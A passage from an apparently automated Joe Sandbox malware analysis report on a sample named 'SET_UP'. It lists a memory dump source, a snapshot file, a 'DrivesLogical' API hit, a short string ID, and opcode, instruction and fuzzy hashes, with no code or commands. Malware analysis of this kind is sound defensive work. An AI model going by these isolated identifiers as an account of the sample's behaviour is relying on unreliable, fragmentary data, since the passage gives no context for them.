                                                                                                            • Instruction Fuzzy Hash: 56B092A1D858108396422E1024202FDA13A8E87200F006164C006223419A16EA1588AE
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DrivesLogical
                                                                                                            • String ID: 2S]$KU$WQ$[
                                                                                                            • API String ID: 999431828-544422254
                                                                                                            • Opcode ID: 51b407264f9ab5777246320a8b3231082a463b10d61a71ea654fdb29e788c850
                                                                                                            • Instruction ID: aa8e1fe5ef5b0e3f84d7af26e45055e587a64516172888e2cf8cbc69029f3354
                                                                                                            • Opcode Fuzzy Hash: 51b407264f9ab5777246320a8b3231082a463b10d61a71ea654fdb29e788c850
                                                                                                            • Instruction Fuzzy Hash: 3C3162B80093418FD750AF29A89162BBBF0FF96758F00894CF5D68B755E3399941CB87